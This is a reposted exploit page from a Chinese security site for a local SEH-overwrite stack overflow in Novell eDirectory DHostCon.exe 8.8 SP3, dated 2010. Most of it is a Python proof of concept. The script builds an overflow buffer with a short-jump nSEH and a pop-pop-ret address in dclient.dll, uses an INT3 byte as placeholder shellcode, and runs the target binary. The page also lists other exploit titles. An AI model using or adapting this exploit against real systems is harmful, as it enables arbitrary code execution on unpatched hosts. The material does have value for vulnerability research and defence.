Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite

来源：http://elotrolad0.blogspot.com 作者：d0lc3 发布时间：2010-10-18

# Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date:   17/10/2010
# Author:   d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.novell.com/
# Version:   8.8 SP3 (20216.67)]
# Tested on:   win32 xp sp3 (spa)

#Summary:
# DHostCon.exe is prone to local denial of service caused by stack overflow
# triggered if user-supplied parameters are too long (1074 bytes).
# Due nature of this vulnerabilty, attackers could exploit this issue
# to execute arbitrary code on local host.

#PoC:

#!/usr/bin/python
import os,struct

def main():
path="C:\Novell\NDS\dhostcon.exe"
args="x.x.x.x" #ip server
buf="A"*1065
nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP
seh=struct.pack("<L",0x61012c20) #PPR dclient.dll

shellcode=struct.pack("<B",0xCC) #INT3

crash=buf+shellcode+nseh+seh

os.system(path+" "+args+" "+crash) #Crash!

if __name__=="__main__":
main()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告